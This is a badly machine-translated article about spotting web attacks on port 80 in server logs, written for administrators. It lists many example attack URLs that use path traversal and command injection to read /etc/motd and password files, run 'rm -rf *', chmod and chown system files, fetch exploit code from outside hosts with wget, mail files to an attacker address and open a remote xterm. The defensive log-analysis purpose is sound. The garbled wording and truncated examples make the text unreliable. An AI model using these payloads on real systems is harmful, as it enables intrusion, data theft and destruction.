web site services for the default port 80 on its range of security issues continue to release, and even some of the loopholes allow an attacker to obtain permission to enter the system administrator in-house site, Zenomorph The following are some of the 80 ports on the way to attack the traces of Research, and how to tell you from logging problems found.
[Described in detail]
Some parts of the following examples, the display on their web servers and on the universal application of the attack, and the marks left by these examples represent only a major attack on the way, did not list all the forms of attack, which will be part of the A detailed description of each attack, and how to use these loopholes to carry out attacks.

(1) "." ".." And the request "..."
Traces of these attacks is very common for web applications and web servers, which allow for an attacker or a worm program to change the path of the web server, access to a private visit to the region. CGI most of the loopholes in the procedures for containing any of them, ".." request.
Example:
http://host/cgi-bin/lame.cgi?file=../../../../etc/motd
The examples show the attacker mosd the request of the document, if the attacker have the ability to break through the root of the web server, then access to more information and to obtain additional privileges.

(2) "% 20" request
20% of the space that is the value of M 16, although this does not mean that you can use anything, but when you view the log will find it, a number of web servers running on the application of this character might be an effective implementation of the Therefore, you should carefully check the log. On the other hand, the request can sometimes help implement some of the orders.
Example:
http://host/cgi-bin/lame.cgi?page=ls% 20-al ¦
The examples show the attacker carried out a unix command to set out a whole list of requests for documents, leading to the attacker access your important system files, to help him get the privilege to provide further conditions.

(3), "" request
16, said the M-byte space, he can be used to fool web applications and requests for different types of documents.
Examples:
http://host/cgi-bin/lame.cgi?page=index.html
This may be a valid request for this machine, if the attacker took note of the success of this action request, he will find the cgi program.
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd
Perhaps the cgi program does not accept this request because it wants to check the documents of the request suffix, such as: html.shtml or other types of files. Most of the program will tell you the requested file type is invalid, and this time it will tell the attacker's request for documents has to be a character of a suffix of file types, so that an attacker access to the path of the system, the file name, resulting in Your system more sensitive information
http://host/cgi-bin/lame.cgi?page=../../../../etc/motdhtml
This attention to the request, it will cheat cgi program that the document is acceptable to determine the types of documents, some of the applications because of stupid effective inspection at the request document, which is commonly used attacker.

(4) "¦" request
This is a pipe character in unix system in a request for help in the implementation of a number of systems ordered at the same time.
Example:
# Cat access_log ¦ grep-i ".."
(This command will be displayed in the log ".." request, commonly used in the attack and found the worm attack)
Often can see a lot of web applications with the characters, which led to the IDS false alarm log.
You are in the process of careful examination, this is good, you can reduce the error in the intrusion detection alarm system.
Some examples are given below:
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls ¦
The request for the implementation of the order, the following are some examples of changes
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls% 20-al% 20/etc ¦
At the request of the unix systems listed in / etc directory of all documents
http://host/cgi-bin/lame.cgi?page=cat% 20access_log ¦ grep% 20-i% 20 "lame"
The request for an order of cat and grep implementation of the order will be implemented, the query "lame"

(5) ";" request
In unix systems, the number of characters allowed in order to implement his party
Example:
# Id; uname-a
(Id implementation of the order, followed by the implementation of the command uname)
Some of the procedures used in this web of characters, may result in your IDS warned that the failure of the log, you should carefully check your web procedures, so that your IDS reduce the probability of failure of the alarm.

(6), "" request
You should check the log records of these two characters, a large number of reasons, first and foremost this is a show that the characters in the document to add data
Example 1:
# Echo "your hax0red h0 h0">> / etc / motd (written request for information in this document motd)
An attacker can easily use the above as you tamper with the request of the web page. For example, a well-known RDS exploit the attacker is often used to change the web page.
Example 2:
[url = http://host/something.php=Hi% 20mom% 20Im% 20Bold! Hi% 20mom% 20Im% 20Bold!
Html here, you will notice a sign language that he used the same "<",">" characters, such attacks can not lead to an attacker access to the system, which confused people think this is a legitimate information in the web site (lead People visit this link to visit the attacker's address settings, such requests may be converted into 16-band code character forms, so that the attack marks a less obvious)

7) "!" Request
Such characters commonly used language on the request of the SS (Server Side Include) I carried out the attack, the attacker confused the attacker was a user clicks on the link set, and the same as above.
Example:
http://host1/something.php ="-->
Liezi the attacker is likely to do it so that a site host2 documents appeared to come from above host1 (Of course, visitors need to visit the attacker was set by the association. Such a request could be transformed into 16-band code disguised and difficult to find)
At the same time, in this way can also use it to the web site permission to implement an order
Example:
http://host/something.php ="-->
The examples in the implementation of the system's long-range "id" of the order, it will show the web site's user id, usually "nobody" or "www"
This form also contains hidden files allowed.
Example:
http://host/something.php ="-->
The hidden files. Htpasswd will not be displayed, Apache will refuse to establish the rules to this. Ht in the form of the request, and SSI signs that will bypass the restrictions and lead to security problems

(8) "
In some simple php applications, it may be in the long-range systems to web site users to the local authority to implement an order

(9) "` "request
Such characters commonly used in the back of perl in the implementation of the order, the characters in the web application is not often used, so if you see it in the log should be very careful
Example:
http://host/something.cgi = `id`
Wrote a perl problem cgi program will lead to the implementation of an order id
[More]
The following discussion will be part of the attacker more likely to implement the order, together with the requested documents, and if you have long-range order to implement the defect, how to check it found. This is just part of the give you a good idea, and you tell the system what happened, the attacker tried to attack your system marks, but it does not list all of the attacker's command and the use of the request.
"/ bin / ls"
The request for an order of the entire path, in many web applications have this loophole, if you log in many places this request, the possibility is very remote there are loopholes in the implementation of the order, but not necessarily a problem , Or it may be a mistake of warning. Once again, to remind, web applications written (cgi, asp, php ... etc) is the basis of security
Example:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls% 20-al ¦
http://host/cgi-bin/bad.cgi?doh=ls% 20-al;
"cmd.exe"
This is a windows of the shell, if an attacker access and run this script, the server set up to allow conditions in the windows machine can do anything, many of the worm through 80 ports, spread to the remote machine
http://host/scripts/something.asp=../../WINNT/system32/cmd.exe?dir + e:
"/ bin / id"
This is a band 2 of the document, its problems and / bin / ls, if you log in many places this request, the possibility is very remote there are loopholes in the implementation of the order, but not necessarily a problem , Or it may be a mistake of warning.
It will show which belong to the users and which belong to the group
Example:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/id ¦
http://host/cgi-bin/bad.cgi?doh=id;
"/ bin / rm"
This command can delete files, if the incorrect use is very dangerous
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm% 20-rf% 20 * ¦
http://host/cgi-bin/bad.cgi?doh=rm% 20-rf% 20 *;
"wget and tftp" order
These orders are often used to download the attacker may be further privileged documents, wget is under unix command may be used to download a backdoor program, tftp and unix is nt under the command used to download files. Tftp through a number of IIS worm to spread the virus to copy itself to other hosts
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget% 20http: / / host2/Phantasmp.c ¦ http:// host / cgi-bin / bad.cgi? doh = wget% 20http: / / www.hwa-security.net/Phantasmp.c;
"cat" command
The order to view the contents of the paper used to read important information such as profiles, password files, documents and credit cards that you can think of a document
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat% 20/etc/motd ¦ http://host/cgi-bin/ bad.cgi? doh = cat% 20/etc/motd;
"echo" command
The commonly used in order to write data to a file, such as "index.html"
Examples:>% 200day.txt '> http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo% 20 "fc-# kiwis% 20was% 20here "% 20>>% 200day.txt ¦>% 200day.txt '> http://host/cgi-bin/bad.cgi?doh=echo% 20" fc-# kiwis% 20was% 20here "% 20> >% 200day.txt;
"ps" command
The list currently running process, told the attacker to run those remote host software, in order to get some idea of security issues, further powers
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps% 20-aux ¦ http://host/cgi-bin/bad. cgi? doh = ps% 20-aux;
"kill and killall" order
Unix systems in order to kill the process, an attacker can use this command to stop service system and procedures at the same time can erase the traces of the attacker, some would exploit a lot of sub-process
Examples: http://host/cgi-bin/bad.cgi?doh=../bin/kill% 20-9% 200 ¦ http://host/cgi-bin/bad.cgi?doh=kill% 20 -9% 200;
"uname" order
The attacker remote command to tell the name of the machine, some of the time, this web site is located in order to know which isp, perhaps the attacker had visited today. Uname-a usually to a request, which will be recorded in the log file
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname% 20-a ¦ http://host/cgi-bin/bad. cgi? doh = uname% 20-a;
"cc, gcc, perl, python, etc ..." compiler / explanation of the order
The attacker through wget or tftp download exploit, and cc, gcc to compile such a procedure compiled into an executable program, and further access to privileges
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc% 20Phantasmp.c ¦ http://host/cgi-bin/bad. cgi? doh = gcc% 20Phantasmp.c;. / a.out% 20-p% 2031337;
If you view the log found "perl" python "these instructions may be a remote attacker to download the perl, python script, and tried to get local privileges
"mail" command
The attacker usually use this system to order some of the important documents issued to the attacker's own mailbox, and is willing to carry out e-mail bomb attacks
Examples: [url = http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail% 20attacker@fuckcnhonker.org% 20
"xterm / other X applications," an order
xterm used to obtain long-range machine of the shell, if you log in you found these symbols, happen a careful analysis of your system may have been a security breach. Attention in the log to find "% 20-display% 20" characters this, which usually marks the start xterm on the remote machine or X applications
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../usr/X11R6/bin/xterm% 20-display% 20192.168.22.1 ¦ http:// host / cgi-bin / bad.cgi? doh = Xeyes% 20-display% 20192.168.22.1;
"chown, chmod, chgrp, chsh, etc ..." and so on command
Unix systems in order to allow them to change the file permissions permission
chown = set up to allow the owner of the file chmod = allowed to set file permissions permission chgrp = group be allowed to change the document owner powers chsh = allows the user to change the shell
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/chmod% 20777% 20index.html ¦ http://host/cgi-bin/ bad.cgi? doh = chmod% 20777% 20index.html; http://host/cgi-bin/bad.cgi?doh=../../../../bin/chown% 20zeno% 20 / etc / master.passwd ¦ http://host/cgi-bin/bad.cgi?doh=chsh% 20/bin/sh; http://host/cgi-bin/bad.cgi?doh=../. . / .. / .. / bin / chgrp% 20nobody% 20/etc/shadow ¦
"/ etc / passwd" file
This is the system password file, is a shadow over the general, and not allowed to see the encrypted password, but on the attacker, who can know it is a valid user, as well as the system's absolute path name of the site, and other information, usually due to The shadow had been, so an attacker, usually to see / etc / shadow file
"/ etc / master.passwd"
This document is a BSD system password file, containing encrypted password, the file on the root account is only read-only, and the number of unskilled attacker, he tried to open it to read. If the web site is root privileges to run, then for the attacker, will be able to read it, a lot of problems for the system administrator will follow
"/ etc / shadow"
Contains encrypted password system, the root account on the same CD, and / et / master.passwd almost
"/ etc / motd"
When the user into the landing system unix emerging information on the "Message of the Day" in the document, which provides important information and systems administrator for the user to set the number of those users is to see that those who are not also The system contains a version of the information, usually an attacker to view the file, to understand what the system is running on the attacker, the next step is to search for this type of system, exploit, and further access to the system privileges
"/ etc / hosts"
The documents provided by ip address and information network, an attacker can learn more about the system's network settings
"/ usr / local / apache / conf / httpd.conf"
This is the Apache web server configuration file, an attacker can understand, such as cgi, ssi, and other information is available at
"/ etc / inetd.conf"
This is the inetd service profile, an attacker can understand the long-range machine to start those services, whether or not to use the wrapper for access control, if the wrapper is running, the next step will inspect attacker "/ etc / hosts.allow" and " / etc / hosts.deny ", documents, and there may be changes to some of the settings, access to privileges
". htpasswd,. htaccess, and. htgroup"
These documents are usually in the web site for user authentication, an attacker will have to see these documents and to obtain a user name and password, the password file. Htpasswd encrypted, to break through some simple procedures to decrypt, so that those who visit the site of attack Protected areas (usually the user to use the same username and password, and the attacker could otherwise account for a visit)
"access_log and error_log"
These are the apache server's log files, the attacker will often see these documents to see if those requests were recorded, and those of other requests for different places
Typically, the attacker will modify these log files, such as his own address information, the attackers break through the 80 ports of your system and your system does not back up, there is no other record of the proceedings recording system status, which will Intrusion detection work is very difficult to change the
"[drive-letter]: winntrepairsam._ or [drive-letter]: winntrepairsam"
Windows NT file system password, if the long-range order can not be implemented, the attacker will usually request these documents, and then through the "l0pht crack" like password cracking tools to crack, if the attacker tried to attack the administrator password file, if successful Then the remote machine will be brought under control right attacker
[Overflow analysis]
In this article I will not say too much in the overflow on the topic, I will give out those phenomena and marks and special attention should be noted, are often attacked buffer attacker through the code conversion and other means to achieve difficult to find
The following is a simple Liezi
Example: http://host/cgi-bin/helloworld?type=AAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AA
The examples show the attacker to send an application for a lot of the characters A, to test the procedure buffer overflow, the buffer overflow remote host will be the order of implementation of the authority, if the case is a setuid and the main root for the procedure adopted by the spill, Can access the system as a whole, if not setuid such procedures, the overflow is only running to be the web site of user rights
There can not be all about, but you should have regular check of your log file, if that day all of a sudden found that many of the requests, and usually not more than the request, then you are subject to overflow attacks and, of course, may be A new Internet worm attack
[Code conversion]
All of the above-mentioned request of the attack, the attacker is usually known IDS system of regular mechanical check request, usually an attacker to use data conversion tool to the requested content into a 16-band format, IDS will lead to ignore those requests, We are familiar with CGI's Whisker vulnerability scanning tool that is a very good examples. If you log in to see a lot of time to find the 16-band and a number of unusual characters, then the attacker may try to use some of the ways to attack your system
A quick way to find is that your log file in 16 of those band's request to copy your browser, the browser can be transformed into a proper request and show the contents of the request, if you do not Run the risk of a simple man ASCII, you can provide the correct code.
[Conclusion]
This article can not cover all the 80 ports of the attack, but has listed more than most general way to attack the same time, to tell you how to check your log files, and how to increase as some of the IDS rules, to write her aim to web administrator should be concerned about what a good idea, at the same time, I hope this article will help to the process of web developers to write better web program.

For more information visit: 73zz.com